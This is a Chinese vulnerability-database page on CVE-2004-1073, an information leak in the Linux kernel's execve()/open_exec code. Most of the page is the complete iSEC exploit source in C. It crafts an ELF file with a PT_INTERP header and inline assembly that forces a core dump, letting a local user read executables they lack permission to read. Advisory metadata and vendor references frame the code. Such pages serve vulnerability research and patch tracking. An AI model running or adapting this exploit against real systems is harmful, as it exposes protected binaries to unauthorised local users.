Linux Kernel execve() 信息泄露漏洞-安全小百科

Linux Kernel execve() 信息泄露漏洞

漏洞ID	1108270	漏洞类型	设计错误
发布时间	2004-11-10	更新时间	2005-10-20
CVE编号	CVE-2004-1073	CNNVD-ID	CNNVD-200501-062
漏洞平台	Linux	CVSS评分	2.1

|漏洞来源

https://www.exploit-db.com/exploits/624
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200501-062

|漏洞详情

LinuxKernel是开源操作系统Linux所使用的内核。Linuxkernl2.4.x至2.4.27及2.6.x至2.6.8中exec.c的open_exec函数存在漏洞。本地用户可利用PT_INTERP，读取到不可读取的ELF二进制代码。

|漏洞EXP

/*
 *
 * binfmt_elf executable file read vulnerability
 *
 * gcc -O3 -fomit-frame-pointer elfdump.c -o elfdump
 *
 * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/resource.h>
#include <sys/wait.h>

#include <linux/elf.h>

#define BADNAME "/tmp/_elf_dump"

void usage(char *s)
{
        printf("nUsage: %s executablenn", s);
        exit(0);
}

// ugly mem scan code :-)
static volatile void bad_code(void)
{
__asm__(
// "1: jmp 1b n"
                " xorl %edi, %edi n"
                " movl %esp, %esi n"
                " xorl %edx, %edx n"
                " xorl %ebp, %ebp n"
                " call get_addr n"

                " movl %esi, %esp n"
                " movl %edi, %ebp n"
                " jmp inst_sig n"

                "get_addr: popl %ecx n"

// sighand
                "inst_sig: xorl %eax, %eax n"
                " movl $11, %ebx n"
                " movb $48, %al n"
                " int $0x80 n"

                "ld_page: movl %ebp, %eax n"
                " subl %edx, %eax n"
                " cmpl $0x1000, %eax n"
                " jle ld_page2 n"

// mprotect
                " pusha n"
                " movl %edx, %ebx n"
                " addl $0x1000, %ebx n"
                " movl %eax, %ecx n"
                " xorl %eax, %eax n"
                " movb $125, %al n"
                " movl $7, %edx n"
                " int $0x80 n"
                " popa n"

                "ld_page2: addl $0x1000, %edi n"
                " cmpl $0xc0000000, %edi n"
                " je dump n"
                " movl %ebp, %edx n"
                " movl (%edi), %eax n"
                " jmp ld_page n"

                "dump: xorl %eax, %eax n"
                " xorl %ecx, %ecx n"
                " movl $11, %ebx n"
                " movb $48, %al n"
                " int $0x80 n"
                " movl $0xdeadbeef, %eax n"
                " jmp *(%eax) n"

        );
}

static volatile void bad_code_end(void)
{
}

int main(int ac, char **av)
{
struct elfhdr eh;
struct elf_phdr eph;
struct rlimit rl;
int fd, nl, pid;

        if(ac<2)
                usage(av[0]);

// make bad a.out
        fd=open(BADNAME, O_RDWR|O_CREAT|O_TRUNC, 0755);
        nl = strlen(av[1])+1;
        memset(&eh, 0, sizeof(eh) );

// elf exec header
        memcpy(eh.e_ident, ELFMAG, SELFMAG);
        eh.e_type = ET_EXEC;
        eh.e_machine = EM_386;
        eh.e_phentsize = sizeof(struct elf_phdr);
        eh.e_phnum = 2;
        eh.e_phoff = sizeof(eh);
        write(fd, &eh, sizeof(eh) );

// section header(s)
        memset(&eph, 0, sizeof(eph) );
        eph.p_type = PT_INTERP;
        eph.p_offset = sizeof(eh) + 2*sizeof(eph);
        eph.p_filesz = nl;
        write(fd, &eph, sizeof(eph) );

        memset(&eph, 0, sizeof(eph) );
        eph.p_type = PT_LOAD;
        eph.p_offset = 4096;
        eph.p_filesz = 4096;
        eph.p_vaddr = 0x0000;
        eph.p_flags = PF_R|PF_X;
        write(fd, &eph, sizeof(eph) );

// .interp
        write(fd, av[1], nl );

// execable code
        nl = &bad_code_end - &bad_code;
        lseek(fd, 4096, SEEK_SET);
        write(fd, &bad_code, 4096);
        close(fd);

// dump the shit
        rl.rlim_cur = RLIM_INFINITY;
        rl.rlim_max = RLIM_INFINITY;
        if( setrlimit(RLIMIT_CORE, &rl) )
                perror("nsetrlimit failed");
        fflush(stdout);
        pid = fork();
        if(pid)
                wait(NULL);
        else
                execl(BADNAME, BADNAME, NULL);

        printf("ncore dumped!nn");
        unlink(BADNAME);

return 0;
} 

// milw0rm.com [2004-11-10]

|参考资料

来源:REDHAT
名称:RHSA-2004:549
链接:http://www.redhat.com/support/errata/RHSA-2004-549.html
来源:FEDORA
名称:FLSA:2336
链接:https://bugzilla.fedora.us/show_bug.cgi?id=2336
来源:XF
名称:linux-elf-setuid-gain-privileges(18025)
链接:http://xforce.iss.net/xforce/xfdb/18025
来源:MISC
链接:http://www.isec.pl/vulnerabilities/isec-0017-binfmt_elf.txt
来源:BID
名称:11646
链接:http://www.securityfocus.com/bid/11646
来源:REDHAT
名称:RHSA-2006:0191
链接:http://www.redhat.com/support/errata/RHSA-2006-0191.html
来源:REDHAT
名称:RHSA-2006:0190
链接:http://www.redhat.com/support/errata/RHSA-2006-0190.html
来源:REDHAT
名称:RHSA-2005:293
链接:http://www.redhat.com/support/errata/RHSA-2005-293.html
来源:REDHAT
名称:RHSA-2004:505
链接:http://www.redhat.com/support/errata/RHSA-2004-505.html
来源:REDHAT
名称:RHSA-2004:504
链接:http://www.redhat.com/support/errata/RHSA-2004-504.html
来源:MANDRAKE
名称:MDKSA-2005:022
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2005:022
来源:DEBIAN
名称:DSA-1082
链接:http://www.debian.org/security/2006/dsa-1082
来源:DEBIAN
名称:DSA-

相关推荐: Microsoft Windows XP – Help and Support Center Interface Spoofing

Microsoft Windows XP – Help and Support Center Interface Spoofing 漏洞ID 1054390 漏洞类型发布时间 2004-02-17 更新时间 2004-02-17 CVE编号 N/A CNNV…

文章版权归作者所有，未经允许请勿转载。

THE END